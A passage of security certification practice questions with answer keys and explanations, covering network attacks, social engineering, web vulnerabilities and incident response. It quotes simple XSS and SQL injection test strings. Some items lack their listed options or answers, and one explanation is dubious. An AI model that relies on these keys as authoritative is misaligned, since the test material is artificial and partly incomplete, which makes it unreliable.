Option A is wrong because DNS poisoning involves corrupting DNS records to redirect domain names to malicious IPs, but the issue here is at Layer 2 (ARP) with MAC-to-IP mappings, not DNS resolution. Option C is wrong because a replay attack captures and retransmits valid network frames to impersonate a device or cause duplication, but it does not directly alter ARP caches or redirect gateway traffic to a workstation MAC. Option D is wrong because denial of service (DoS) aims to overwhelm or disrupt services, but the specific symptom of ARP cache entries mapping the gateway to a workstation MAC indicates active manipulation, not just traffic timing out as a secondary effect.
A threat intelligence feed says an adversary rotates domains daily, uses cloud VPS hosting, and reuses the same malware sample across several campaigns. Analysts want the indicator that remains useful even when the domain changes. What should they prioritize?
A.The current domain name because it is the easiest item to block immediately.
B.The malware's SHA-256 file hash because it uniquely identifies the sample.
C.The cloud provider's entire ASN because all traffic from that provider is automatically malicious.
D.The malware's file name because attackers usually keep the same name for convenience.
AnswerB
A file hash is a highly specific indicator for a known binary and remains useful even if the attacker changes domains or hosting providers. Since the report says the same malware sample is reused, the hash provides a stable detection and correlation point across campaigns. It is a stronger immediate IOC than infrastructure that can be replaced quickly.
Why this answer
The malware's SHA-256 file hash is the most persistent indicator because it is a cryptographic hash that uniquely identifies the specific binary sample, regardless of the domain or IP address used for delivery. Unlike domains or IPs, which the adversary can rotate daily, the hash remains constant as long as the same malware sample is reused across campaigns. This makes it a reliable indicator of compromise (IOC) for detection via file reputation or hash-based blocklists.
Exam trap
The trap here is that candidates often prioritize the most immediately blockable indicator (the domain) over the most persistent one (the hash), failing to recognize that adversaries specifically rotate domains to evade static blocklists.
How to eliminate wrong answers
Option A is wrong because the current domain name is ephemeral—the adversary rotates it daily, so blocking it provides only temporary protection and requires constant updates. Option C is wrong because the cloud provider's entire ASN is not automatically malicious; legitimate traffic also originates from that ASN, and blocking it would cause widespread false positives and deny service to benign users.
A caller says they are from IT support and asks a user to read back the one-time MFA code that just arrived on their phone. What type of attack is this most likely?
A.Phishing
B.Smishing
C.Vishing
D.Baiting
AnswerC
Vishing is voice phishing, where an attacker uses a phone call or VoIP call to manipulate a target. Asking for an MFA code by phone is a common and dangerous tactic because the attacker may be trying to complete a real login.
Why this answer
This is a vishing (voice phishing) attack because the attacker uses a phone call to socially engineer the victim into revealing a one-time MFA code. Unlike phishing (email) or smishing (SMS), vishing relies on voice communication to bypass technical controls and trick the user into providing the code, which the attacker can then use to authenticate as the victim.
Exam trap
The trap here is that candidates see 'MFA code' and 'phone' and incorrectly assume smishing (SMS-based phishing), but the attack vector is the voice call, not the text message, which defines it as vishing.
How to eliminate wrong answers
Option A is wrong because phishing specifically refers to attacks carried out via email, often with malicious links or attachments, not a phone call requesting an MFA code. Option B is wrong because smishing is conducted via SMS text messages, not a voice call; while the MFA code arrives via SMS, the attack vector is the phone call, making it vishing.
Based on the exhibit, what type of malware behavior is most likely occurring?
A.Ransomware, because the endpoint made an outbound connection after opening a document.
B.Fileless attack, because PowerShell was launched in memory with no new payload written to disk.
C.Spyware, because the laptop made an encrypted outbound connection.
D.Worm activity, because the laptop communicated with an external IP address.
AnswerB
This is a fileless attack because the malicious activity relies on script execution rather than a traditional dropped executable. The encoded PowerShell command, hidden execution, and absence of a new file on disk strongly indicate memory-based or script-based malware behavior that can evade basic file scanning.
Why this answer
The exhibit shows PowerShell being launched in memory with no new payload written to disk, which is the hallmark of a fileless attack. Fileless malware exploits legitimate system tools like PowerShell to execute malicious code directly in memory, evading traditional signature-based detection that relies on scanning files on disk.
Exam trap
The trap here is that candidates see an outbound connection and immediately assume ransomware or spyware, but the key indicator is PowerShell executing in memory with no disk write, which is the defining characteristic of a fileless attack.
How to eliminate wrong answers
Option A is wrong because ransomware typically encrypts files and demands payment, but the exhibit shows no evidence of file encryption or ransom note; the outbound connection alone does not confirm ransomware. Option C is wrong because spyware exfiltrates data over encrypted channels, but the exhibit lacks indicators of data collection or exfiltration; an encrypted outbound connection is common for many legitimate applications. Option D is wrong because worm activity involves self-replicating propagation across networks, and the exhibit only shows a single outbound connection to an external IP, which is insufficient to confirm worm behavior.
A vulnerability scan reports that a public web server is running an operating system version that no longer receives security updates. Which issue is present?
An unsupported operating system is an outdated component because it no longer receives vendor security fixes.
Why this answer
An operating system version that no longer receives security updates is an outdated component. This means the vendor has ceased patching known vulnerabilities, leaving the system exposed to exploits that target unpatched flaws. In the context of a public web server, this directly violates the principle of maintaining a secure baseline and is a common finding in vulnerability scans.
Exam trap
The trap here is that candidates may confuse 'outdated component' with 'weak permissions' because both involve configuration issues, but the question specifically describes a version that no longer receives updates, which is a lifecycle/obsolescence problem, not a permissions misconfiguration.
How to eliminate wrong answers
Option A is wrong because weak permissions refer to misconfigured access controls (e.g., world-writable files or improper ACLs), not the age or update status of the OS itself. Option C is wrong because DNS poisoning is an attack that corrupts DNS resolution data (e.g., spoofed A records) to redirect traffic, unrelated to the OS version's patch level. Option D is wrong because smishing is a social engineering attack using SMS text messages to trick users into revealing information, not a technical vulnerability in server software.
An organization is implementing security controls to mitigate the risk of social engineering attacks. Which three of the following are effective mitigations? (Choose three.)
Select 3 answers
.Implementing a strict clean desk policy
.Conducting regular security awareness training for all employees
.Deploying email filtering and anti-phishing gateways
.Requiring multifactor authentication for all systems
.Installing physical barriers at building entrances
.Disabling USB ports on all workstations
Why this answer
Security awareness training is a critical mitigation because it educates employees to recognize and resist social engineering tactics such as phishing, pretexting, and baiting. By regularly updating training content to reflect current attack vectors, organizations reduce the likelihood that human error will be exploited. This directly addresses the human factor, which is often the weakest link in security.
Exam trap
The trap here is that candidates often confuse general security best practices (like clean desk policies or disabling USB ports) with specific mitigations for social engineering, failing to recognize that social engineering exploits human behavior and communication channels, not just physical or technical vectors.
After a switch reboot in a conference room, several laptops obtain valid IP addresses in the correct subnet, but their default gateway changes to 10.20.40.50, which is not the legitimate router. Packet capture shows DHCP offers coming from a MAC address that does not belong to the approved DHCP server, and the rogue device responds faster than the real server. What attack is most likely occurring?
A.ARP poisoning, because the attacker is changing IP-to-MAC mappings on the local network.
B.Rogue DHCP service, because an unauthorized DHCP server is handing out network settings.
C.Replay attack, because the attacker is reusing old DHCP offers.
D.DNS poisoning, because the clients are being sent to the wrong network path.
AnswerB
A rogue DHCP service is the best answer. The clients receive valid-looking leases from an unauthorized device, and the device supplies the default gateway before the legitimate server can respond. This is a common and dangerous network attack because it can redirect traffic, enable interception, or break connectivity without requiring packet spoofing at the ARP layer.
Why this answer
The scenario describes an unauthorized device responding to DHCP discovery messages faster than the legitimate server, assigning valid IPs but a rogue default gateway (10.20.40.50). This is the classic behavior of a rogue DHCP server, which intercepts DHCP traffic to manipulate client network settings, enabling man-in-the-middle attacks. The packet capture confirming DHCP offers from an unknown MAC address directly identifies the attack as a Rogue DHCP service.
Exam trap
The trap here is that candidates confuse the symptom (wrong gateway) with ARP poisoning or DNS attacks, but the key clue is the DHCP offer source and the faster response time, which uniquely identifies a rogue DHCP server.
How to eliminate wrong answers
Option A is wrong because ARP poisoning involves sending forged ARP replies to associate an attacker's MAC address with a legitimate IP, not distributing DHCP lease offers with a fake gateway. Option C is wrong because a replay attack would capture and retransmit valid DHCP offers from the real server, not generate new offers with a different gateway IP from an unauthorized MAC. Option D is wrong because DNS poisoning manipulates DNS resolution to redirect traffic to malicious sites, whereas this attack alters the default gateway at the network layer via DHCP, not DNS records.
Based on the exhibit, what type of web attack is most likely taking place?
A.Cross-site scripting, because the input is visible in the URL and causes an error.
B.SQL injection, because the attacker is manipulating the database query with crafted input.
C.Broken authentication, because the application returns a 500 error.
D.Insecure deserialization, because the application is parsing attacker-controlled data.
AnswerB
This is SQL injection because the input includes SQL control characters and logic that alter the intended query. The database error and the developer note about string concatenation confirm that user-supplied data is being inserted directly into SQL without parameterization. That makes the application vulnerable to query manipulation.
Why this answer
Option B is correct because the exhibit shows a URL parameter (e.g., `id=1 OR 1=1`) that is being passed to a database query. The attacker is injecting SQL syntax to manipulate the query logic, which is the hallmark of SQL injection. The 500 error likely results from the database server crashing or returning an invalid result set, confirming that the injection is affecting the database.
Exam trap
The trap here is that candidates see the input in the URL and the error message and mistakenly associate them with cross-site scripting (XSS), failing to recognize that the error is a database server response, not a client-side script execution.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into a web page, not manipulating database queries; the visible input in the URL and the error are not indicative of XSS, which typically executes in the browser. Option C is wrong because broken authentication refers to flaws in session management or credential verification (e.g., weak passwords, session fixation), not to database query manipulation or server errors from SQL injection. Option D is wrong because insecure deserialization involves the processing of serialized objects (e.g., PHP or Java serialization) that can lead to remote code execution, not the direct injection of SQL commands into a URL parameter.
A web portal builds its database query by directly appending a user's search input. When the user types a single quote, the application returns a database error. Which attack is most likely?
SQL injection happens when untrusted input alters a database query the application should have protected.
Why this answer
The application directly concatenates user input into a database query without sanitization. When a single quote (') is appended, it breaks the SQL string delimiter, causing a syntax error that the database exposes. This is the classic indicator of a SQL injection vulnerability, where an attacker can manipulate the query structure.
Exam trap
The trap here is that candidates may confuse the immediate symptom (a database error) with cross-site scripting, but the single quote directly points to SQL syntax breakage, not script execution in the browser.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, not directly causing database errors via a single quote in a query. Option C is wrong because DNS poisoning corrupts DNS resolver caches to redirect traffic, not database query manipulation. Option D is wrong because privilege escalation is the act of gaining elevated access rights, not the injection technique that leads to unauthorized data access.
Based on the exhibit, what type of social engineering attack is the caller using?
A.Vishing, because the attacker is using a phone call to pressure the target.
B.Ransomware, because the caller is asking for money.
C.SQL injection, because the caller is asking for account details.
D.Tailgating, because the attacker mentions an executive assistant.
AnswerA
The attacker is making a voice call and using urgency, authority, and time pressure to obtain sensitive financial information. That is a classic example of vishing, which is phishing conducted over the phone.
Why this answer
The caller is using a phone call to impersonate a trusted figure (the CEO) and create urgency to pressure the target into violating security policy. This matches the definition of vishing (voice phishing), which relies on social engineering over voice channels to extract sensitive information or actions.
Exam trap
The trap here is that candidates may confuse the mention of 'asking for money' with ransomware, but ransomware is a technical malware attack, not a social engineering phone call, and the question explicitly describes a phone-based interaction.
How to eliminate wrong answers
Option B is wrong because ransomware is a type of malware that encrypts files and demands payment for decryption, not a social engineering attack conducted via phone call. Option C is wrong because SQL injection is a web application attack that exploits improper input validation to manipulate database queries, not a social engineering technique. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area without proper authentication, not a phone-based social engineering tactic.
A user says their files suddenly have a new extension and a note appears demanding payment to restore access. Which type of malware is most likely involved?
A.Ransomware
B.Adware
C.Spam filter
D.Screen saver
AnswerA
Ransomware commonly encrypts files and leaves a payment demand, which matches the described symptoms.
Why this answer
Ransomware is the correct answer because it specifically encrypts files and appends a new extension, then displays a ransom note demanding payment for decryption. This matches the user's description of files becoming inaccessible with a new extension and a payment demand.
Exam trap
The trap here is that candidates may confuse ransomware with adware or other malware types, but the key differentiator is the combination of file encryption, extension change, and a ransom demand.
How to eliminate wrong answers
Option B (Adware) is wrong because adware displays unwanted advertisements and does not encrypt files or demand ransom payments. Option C (Spam filter) is wrong because a spam filter is a security tool that blocks unwanted email, not a type of malware that modifies files. Option D (Screen saver) is wrong because a screen saver is a benign utility that prevents screen burn-in and has no capability to encrypt files or demand payments.
A help desk analyst receives a ticket stating that an employee got an urgent text message from someone claiming to be the CEO. The message asked the employee to buy gift cards and send the redemption codes immediately. What attack is most likely taking place?
A.Phishing, because the attacker is trying to steal information through a deceptive message sent to a user.
B.Smishing, because the attacker is using SMS or text messaging to trick the employee into taking an action.
C.Vishing, because the attacker is using a phone call to pressure the employee into complying.
D.Baiting, because the attacker is tempting the user with a reward in exchange for cooperation.
AnswerB
Smishing is phishing delivered through text messaging. The attacker is impersonating an executive and creating urgency to pressure the employee into buying gift cards and revealing codes. That combination of mobile delivery, impersonation, and urgency fits a text-based social engineering attack.
Why this answer
Option B is correct because the attack uses SMS/text messaging as the delivery vector, which is the defining characteristic of smishing. The urgent request to buy gift cards and send redemption codes is a classic social engineering tactic designed to exploit the employee's trust in the CEO's authority, not to steal credentials or install malware directly.
Exam trap
The trap here is that candidates may confuse smishing with general phishing (Option A) because both involve deceptive messages, but the exam specifically tests the delivery vector—SMS vs. email—as the key differentiator for attack classification.
How to eliminate wrong answers
Option A is wrong because phishing typically refers to broader email-based attacks, not specifically SMS/text messages; while smishing is a subset of phishing, the question explicitly describes a text message, making smishing the more precise term. Option C is wrong because vishing (voice phishing) requires a phone call, not a text message; the scenario lacks any mention of a voice interaction. Option D is wrong because baiting involves offering a fake reward or enticement (e.g., free download or USB drop) to trick the user, whereas this attack uses a direct request for action under false authority, not a lure.
At a conference, employees connect to a Wi-Fi network named "CorpGuest" and then see certificate warnings in their browsers. The network has a stronger signal than the hotel's legitimate guest Wi-Fi. What attack is this?
A rogue access point, often called an evil twin, imitates a real network to lure users onto it.
Why this answer
This scenario describes a rogue access point attack. The attacker sets up a Wi-Fi network named "CorpGuest" with a stronger signal than the legitimate hotel guest Wi-Fi, tricking employees into connecting to it. Once connected, the attacker can intercept traffic and present a fake certificate, causing browser certificate warnings.
This is a classic evil twin variant of a rogue access point attack.
Exam trap
The trap here is that candidates may confuse a rogue access point with ARP poisoning because both can enable man-in-the-middle attacks, but the key differentiator is the method of initial access — rogue AP uses a fake wireless network, while ARP poisoning operates on an existing wired or wireless LAN.
How to eliminate wrong answers
Option B (ARP poisoning) is wrong because ARP poisoning involves sending forged ARP messages over a local network to associate the attacker's MAC address with the IP address of a legitimate host, enabling man-in-the-middle attacks on switched networks; it does not involve setting up a fake Wi-Fi network. Option C (Replay attack) is wrong because a replay attack captures and retransmits valid data transmissions to trick the receiver, not to create a fraudulent wireless network or cause certificate warnings. Option D (Denial of service) is wrong because a denial of service attack aims to disrupt or degrade network services, not to impersonate a legitimate access point and intercept user traffic.
Based on the exhibit, what security issue is most likely present?
A.Weak permissions, because the camera streams video to multiple ports.
B.Default credentials, because the admin login is enabled.
C.Exposed service, because management and streaming ports are listening on all interfaces and allowed from anywhere.
D.Outdated component, because firmware version 1.0.3 is listed.
AnswerC
The main issue is exposed service. The camera-web and RTSP services listen on 0.0.0.0, which means all interfaces, and the ACL allows any source to connect. That exposes the device to the network far beyond the intended management scope, creating an easy attack path.
Why this answer
Option C is correct because the exhibit shows that both the management interface (TCP 443) and the streaming interface (TCP 554) are bound to 0.0.0.0 (all interfaces) and the firewall rules allow traffic from 0.0.0.0/0 (any source). This exposes the camera's web management and RTSP streaming services to the entire internet, making it vulnerable to unauthorized access, reconnaissance, and potential exploitation. An exposed service of this nature is a common entry point for attackers to compromise IoT devices.
Exam trap
The trap here is that candidates may focus on the presence of default credentials or outdated firmware as obvious vulnerabilities, but the exhibit does not provide evidence of those—instead, the clear misconfiguration is the service exposure, which is a distinct and common threat in IoT and network device security.
How to eliminate wrong answers
Option A is wrong because streaming video to multiple ports is a normal function of an IP camera (e.g., RTSP on port 554 and HTTP on port 80 for web viewing), and does not inherently indicate weak permissions; weak permissions would refer to misconfigured access control lists or user privileges, not the number of ports used. Option B is wrong because the admin login being enabled is not itself a security issue; the vulnerability arises only if default credentials (e.g., admin/admin) are still in use, which is not indicated in the exhibit. Option D is wrong because firmware version 1.0.3 being listed does not automatically mean it is outdated or vulnerable; without a known CVE or version comparison, the version number alone is not evidence of an outdated component.
An employee receives a text message from an unknown number pretending to be IT. It includes a shortened URL for "urgent MFA re-enrollment" and says the account will be locked in 15 minutes. What is the best response?
A.Open the link and enter the requested information if the page looks legitimate.
B.Report the message through the official security channel and verify the request using known IT contact information.
C.Forward the text to coworkers so they can check whether they received the same message.
D.Reply to the text asking for a company badge number before proceeding.
AnswerB
The safest response is to avoid the link and use an established internal reporting or verification process. This prevents credential theft and helps security track suspicious messages quickly. Verifying through a known contact method, not the message itself, protects the user from smishing and MFA baiting.
Why this answer
Option B is correct because it follows the principle of verifying unsolicited requests through trusted channels, which is a key defense against social engineering and phishing attacks. The message exhibits classic phishing indicators: an unknown sender, a shortened URL (which can mask the true destination), a false sense of urgency, and a request for MFA re-enrollment—a common pretext to harvest credentials or MFA tokens. Reporting through the official security channel ensures the incident is logged and investigated, while verifying with known IT contact information prevents falling for a spoofed or compromised source.
Exam trap
The trap here is that candidates may choose Option A because the message appears urgent and the page looks legitimate, overlooking that attackers can perfectly clone authentication portals and that shortened URLs are a common obfuscation technique in phishing campaigns.
How to eliminate wrong answers
Option A is wrong because opening a shortened URL from an unknown sender and entering credentials, even if the page looks legitimate, risks credential theft via a phishing site that may mimic the real MFA portal; attackers can clone login pages and intercept tokens in real time. Option C is wrong because forwarding the text to coworkers amplifies the threat by spreading a potential phishing link, increasing the likelihood of compromise across the organization; it also bypasses proper incident reporting procedures. Option D is wrong because replying to the text confirms the phone number is active and monitored, which can lead to targeted follow-up attacks, and asking for a badge number is ineffective since attackers can easily fabricate such identifiers.
A user enters `<script>alert('test')</script>` into a public comment field, and other visitors see the script run in their browsers. What attack is this?
A.Cross-site scripting
B.SQL injection
C.Broken authentication
D.Insecure deserialization
AnswerA
Cross-site scripting occurs when attacker-controlled script is stored or reflected and then runs in another user's browser. A comment field that executes script for later visitors is a textbook example.
Why this answer
This is a classic cross-site scripting (XSS) attack because the user-supplied input containing a script tag is echoed back to other visitors' browsers without proper sanitization or encoding. The script executes in the context of the victim's browser, allowing the attacker to steal cookies, redirect users, or deface the page. XSS exploits the trust a user has for a particular website, unlike SQL injection which targets the database.
Exam trap
The trap here is that candidates confuse client-side attacks (XSS) with server-side attacks (SQL injection) because both involve user input, but XSS targets the browser's execution context while SQL injection targets the database query parser.
How to eliminate wrong answers
Option B (SQL injection) is wrong because SQL injection involves injecting malicious SQL queries into input fields to manipulate a backend database, not to execute client-side scripts in a browser. Option C (Broken authentication) is wrong because broken authentication refers to flaws in session management or credential handling (e.g., weak passwords, session fixation), not the injection of client-side code that runs in other users' browsers.
A security analyst is reviewing authentication logs from a corporate web application. The logs show thousands of failed login attempts over the past hour. Each attempt uses a different username, but all attempts use the same password 'Spring2024!'. The source IP addresses are widely distributed across several different geographic regions. Which type of attack is the analyst most likely observing?
A.Brute-force attack
B.Password spraying attack
C.Credential stuffing attack
D.Dictionary attack
AnswerB
Password spraying involves using a small number of common passwords against a large number of user accounts. This matches the log pattern: different usernames, same password, many attempts.
Why this answer
The attack uses a single common password ('Spring2024!') against many different usernames, which is the hallmark of a password spraying attack. Unlike brute-force attacks that target one account with many passwords, password spraying avoids account lockout by trying one password across many accounts. The wide distribution of source IPs is consistent with a distributed password spraying campaign, often using botnets or proxies.
Exam trap
The trap here is confusing password spraying with credential stuffing: candidates see 'different usernames' and assume stolen credentials are being used, but the single reused password across all attempts is the key differentiator for password spraying.
How to eliminate wrong answers
Option A is wrong because a brute-force attack typically targets a single username with many password attempts, not a single password against many usernames. Option C is wrong because credential stuffing uses previously leaked username/password pairs from other breaches, not a single password across different usernames. Option D is wrong because a dictionary attack tries many passwords from a wordlist against a single account, not a single password against many accounts.
Based on the exhibit, what network attack is most likely occurring on the office LAN?
A.ARP poisoning, because a rogue system is sending false layer 2 address mappings.
B.Replay attack, because the same ARP reply appears multiple times.
C.Denial of service, because users notice certificate warnings.
D.DNS poisoning, because the users cannot reach internal sites cleanly.
AnswerA
ARP poisoning is the best answer because the capture shows false ARP replies mapping the gateway IP to a different MAC address. The alternating gateway cache entries and certificate warnings are consistent with traffic being redirected through an attacker in a man-in-the-middle position.
Why this answer
ARP poisoning is the correct answer because the exhibit shows a rogue system sending unsolicited ARP replies that map the gateway's IP address to the attacker's MAC address. This causes traffic destined for the gateway to be redirected to the attacker, enabling man-in-the-middle interception. The attack exploits the lack of authentication in ARP, allowing false layer 2 address mappings to corrupt the ARP cache of other hosts on the LAN.
Exam trap
The trap here is that candidates may confuse ARP poisoning with DNS poisoning because both involve false mappings, but ARP poisoning operates at layer 2 (MAC addresses) while DNS poisoning operates at the application layer (domain names), and the exhibit's focus on MAC address mappings clearly points to ARP.
How to eliminate wrong answers
Option B is wrong because replay attacks involve capturing and retransmitting valid packets, but the exhibit shows multiple identical ARP replies from a single rogue source, not a replay of a legitimate ARP response. Option C is wrong because certificate warnings are typically associated with TLS/SSL interception or rogue access points, not directly with ARP poisoning, and the exhibit does not indicate a denial of service condition. Option D is wrong because DNS poisoning targets the DNS resolver cache with false domain-to-IP mappings, whereas the exhibit shows ARP replies manipulating MAC-to-IP mappings at layer 2, not DNS records.
A security tool reports repeated DNS requests for long, random-looking subdomains under the same domain name. What is the most likely explanation?
A.DNS tunneling used to hide command-and-control traffic.
B.A normal software update process from the operating system.
C.A successful password reset workflow for users.
D.A hardware failure on the network adapter.
AnswerA
Long, random subdomains can be a sign of DNS tunneling, where malware hides data or control traffic inside DNS queries.
Why this answer
DNS tunneling encodes non-DNS traffic (e.g., C2 commands) into DNS queries and responses, often using long, random-looking subdomains to evade detection. Repeated requests for such subdomains under a single domain are a classic indicator of data exfiltration or covert channel activity, as each query can carry a small payload.
Exam trap
The trap here is that candidates may confuse DNS tunneling with legitimate DNS behavior like load balancing or CDN resolution, but the randomness and repetition of subdomains under a single domain are the key differentiators for malicious covert channels.
How to eliminate wrong answers
Option B is wrong because normal software updates use predictable, vendor-specific domains and do not generate random-looking subdomains; they typically fetch files from known URLs or CDNs. Option C is wrong because password reset workflows involve HTTP/HTTPS traffic to a web application, not DNS queries with random subdomains; DNS is not used to carry password reset data.
A SaaS portal issues signed JWTs in a browser cookie. The help desk confirms a user logged out at 09:10, but SIEM logs show the same token was accepted from a different IP at 09:12 and continued working until the token expired. The application does not keep a server-side revocation list. What weakness is most likely being abused?
A.SQL injection, because the attacker must be manipulating backend database logic to reuse the token.
B.Session hijacking or session abuse, because the attacker can replay a valid token after logout without revocation.
C.Insecure deserialization, because the token is being decoded and reconstructed on the server.
D.Cross-site request forgery, because the request is coming from a different IP address.
AnswerB
This is session hijacking or session abuse because the attacker is using a valid session token outside the original user context. JWTs are often stateless, so if the application does not track revocation, logout may not immediately invalidate a copied token. The cross-IP reuse after logout strongly suggests the token was stolen or replayed and remained acceptable until its normal expiration.
Why this answer
The correct answer is B because the scenario describes a classic session hijacking or session abuse attack. The application issues signed JWTs in cookies and does not maintain a server-side revocation list, meaning once a token is issued, it remains valid until its expiration. Even after the legitimate user logs out at 09:10, the attacker can replay the same JWT from a different IP at 09:12, and the server will accept it because there is no mechanism to invalidate the token.
This lack of revocation is the core weakness being exploited.
Exam trap
The trap here is that candidates may confuse session hijacking with CSRF, but CSRF requires a forged request from a different site, not simply a different IP address, and the key issue is the lack of token revocation after logout.
How to eliminate wrong answers
Option A is wrong because SQL injection involves manipulating database queries through input fields, not replaying a valid JWT; the attacker is not altering backend logic but simply reusing a stolen token. Option C is wrong because insecure deserialization refers to vulnerabilities when untrusted data is deserialized, potentially leading to remote code execution, but JWTs are typically decoded and verified using cryptographic signatures, not deserialized in a way that allows code injection. Option D is wrong because cross-site request forgery (CSRF) exploits the trust a site has in a user's browser by forging requests from a different origin, not by replaying a token from a different IP address; the IP change alone does not indicate CSRF.
During testing of a shopping portal, a POST request to /api/address/update succeeds even when the anti-CSRF token is removed. In a separate test, changing customerId=1842 to customerId=1843 in a GET request returns another user's invoice data. Which two vulnerabilities are present? Select two.
Select 2 answers
A.Cross-site request forgery is present because the state-changing request works without a valid anti-CSRF token.
B.Broken access control or IDOR is present because changing customerId reveals another user's invoice.
C.SQL injection is present because the customerId value changes in the URL.
D.Cross-site scripting is present because the invoice data is returned in the browser.
E.Insecure deserialization is present because the request uses JSON-like parameters.
AnswersA, B
If a state-changing request succeeds without a valid anti-CSRF token, the application is not reliably verifying that the request originated from the intended user session. That makes the action vulnerable to cross-site request forgery, where a malicious site can induce a logged-in user to submit an unauthorized request.
Why this answer
Option A is correct because the POST request to /api/address/update succeeds without the anti-CSRF token, which means the application does not validate the origin of the request. This allows an attacker to forge a cross-site request that changes the victim's address without their knowledge, a classic CSRF vulnerability.
Exam trap
The trap here is that candidates confuse IDOR with SQL injection because both involve manipulating a parameter in the URL, but IDOR is about missing access controls, not database injection.
EDR alerts show a finance laptop spawning an unsigned executable from %AppData%, attempting to read LSASS memory, and making outbound HTTPS connections to a rare domain. The user says they only opened a spreadsheet attachment. What is the best immediate action?
A.Reboot the laptop to clear any malicious process from memory.
B.Isolate the laptop from the network using the EDR platform.
C.Run a full antivirus scan and wait for the results before taking further action.
D.Reset the user's password and keep the laptop online for monitoring.
AnswerB
Network isolation immediately stops outbound command-and-control traffic and reduces the chance of lateral movement. It also preserves the endpoint for later forensics better than powering it off or wiping it. Because the host is still active, isolation is the safest containment step while the team gathers volatile evidence and decides on eradication.
Why this answer
Option B is correct because the EDR alerts indicate a likely credential theft attempt (LSASS read) and C2 communication (rare domain). Isolating the laptop immediately stops data exfiltration and lateral movement, which is the priority before any remediation. Reboot, scan, or password reset would not prevent the attacker from already having access to credentials or the network.
Exam trap
The trap here is that candidates think rebooting or scanning is sufficient, but CompTIA emphasizes that containment (isolation) is the immediate step to stop active compromise before any remediation or investigation.
How to eliminate wrong answers
Option A is wrong because rebooting only clears volatile memory but does not prevent the malware from persisting via the %AppData% executable or re-establishing C2; it also destroys forensic evidence. Option C is wrong because running a full antivirus scan while the laptop remains online allows continued data exfiltration and potential lateral movement; waiting for results wastes critical time. Option D is wrong because resetting the user's password does not remove the malware or stop its outbound C2 traffic, and keeping the laptop online risks further compromise.
An employee receives a text message from "IT Help" saying their account will be disabled unless they tap a link and enter a one-time code. Five minutes later, someone calls claiming to be from IT and asks the employee to read back the same code. Which two social engineering delivery methods are used? Select two.
Select 2 answers
A.Smishing
B.Vishing
C.Baiting
D.Whaling
E.Tailgating
AnswersA, B
Smishing is phishing delivered by text message. The message uses urgency, a link, and a request for a one-time code, which are common smishing traits.
Why this answer
Smishing is correct because the initial contact is via SMS text message, which is the defining characteristic of smishing (SMS phishing). The attacker uses a text message to deliver a phishing lure, prompting the employee to tap a link and enter a one-time code.
Exam trap
The trap here is that candidates may confuse smishing with vishing or phishing, but the question explicitly asks for two delivery methods, and the combination of SMS (smishing) and voice call (vishing) is the key distinction.
A vulnerability scanner reports a critical issue on a Linux server. The administrator checks the application and confirms the vulnerable package is installed, but the affected feature is not enabled anywhere in production. What should the security team do next?
A.Ignore the finding permanently because the package is installed
B.Validate whether the issue is a false positive or lower-risk finding before prioritizing remediation
C.Immediately shut down the server without further investigation
D.Apply an exception without documenting any compensating controls
AnswerB
When scan results do not match actual exposure, the next step is to validate the finding and confirm real risk.
Why this answer
Option B is correct because the vulnerability scanner reports a critical issue, but the administrator has confirmed the vulnerable package is installed while the affected feature is not enabled in production. This means the actual risk is lower than the scanner's severity rating, as exploitation requires the feature to be active. The security team should validate whether this is a false positive or a lower-risk finding to prioritize remediation efforts appropriately, ensuring resources are allocated to genuine threats.
Exam trap
The trap here is that candidates assume any 'critical' scanner finding must be immediately remediated or ignored, failing to recognize that risk assessment requires verifying the actual exploitability in the specific environment.
How to eliminate wrong answers
Option A is wrong because ignoring a finding permanently without further analysis violates security best practices; the package could be exploited if the feature is inadvertently enabled or if a different attack vector emerges. Option C is wrong because immediately shutting down the server is an overreaction that disrupts production without evidence of active exploitation, and it bypasses proper incident response procedures. Option D is wrong because applying an exception without documenting compensating controls fails to provide a risk acceptance record or mitigation strategy, which is required for auditability and future reference.
A customer service application shows the same session ID being used from two countries within five minutes. The legitimate user did not report a password change, but an order shipping address was modified successfully without reauthentication. What attack pattern is most likely?
A.Broken authentication, because the application failed to verify the user again.
B.Session abuse, because a stolen or replayed session token allowed unauthorized actions.
C.Cross-site request forgery, because the attacker may have tricked the browser into sending a request.
D.Credential stuffing, because the account was likely accessed using reused passwords.
AnswerB
Session abuse is the best fit when an attacker reuses a valid token or session ID to impersonate a user. The address change without reauthentication strongly suggests the attacker hijacked an active session instead of successfully guessing a password.
Why this answer
The simultaneous use of the same session ID from two different countries within five minutes, combined with a successful address change without reauthentication, indicates that an attacker has obtained and reused the legitimate user's session token. This is session abuse, where the attacker leverages a stolen or replayed session token to perform unauthorized actions, bypassing the need for credentials or reauthentication.
Exam trap
The trap here is that candidates confuse session abuse with broken authentication, but the key distinction is that the session token was already valid and reused, not that the authentication mechanism itself was flawed during login.
How to eliminate wrong answers
Option A is wrong because broken authentication typically refers to flaws in the login or credential verification process, not the reuse of a valid session token; the application did verify the user initially, but failed to detect token theft or enforce reauthentication for sensitive actions. Option C is wrong because cross-site request forgery (CSRF) relies on tricking the user's browser into making an unintended request using the user's existing session, but the scenario describes the same session ID being used from two different countries, which is a sign of token theft, not a forged request from the user's browser. Option D is wrong because credential stuffing involves using stolen username/password pairs to gain access, but the session ID is already active and the password was not changed, indicating the attacker bypassed authentication entirely by reusing the session token.
A security analyst receives reports that several employees are being redirected to a fraudulent login page after typing the correct URL for a company application into their browser. Further investigation reveals that the company's internal DNS server has been compromised. Which type of attack best describes this scenario?
A.Phishing
B.Spear phishing
C.Pharming
D.Vishing
AnswerC
Pharming redirects users to fraudulent websites by compromising DNS servers or host files, even when the correct URL is entered. The DNS server compromise in this scenario is a classic pharming technique.
Why this answer
Pharming is correct because the attack redirects users from a legitimate website to a fraudulent one without their knowledge or interaction, typically by compromising the DNS resolution process. In this scenario, the internal DNS server has been compromised, so when employees type the correct URL, the DNS server returns the IP address of a fake login page instead of the real one. This is a classic example of DNS poisoning, a form of pharming.
Exam trap
The trap here is that candidates often confuse pharming with phishing because both involve fake login pages, but pharming does not require the user to click a link—it subverts the DNS resolution process, making it a technical infrastructure attack rather than a social engineering one.
How to eliminate wrong answers
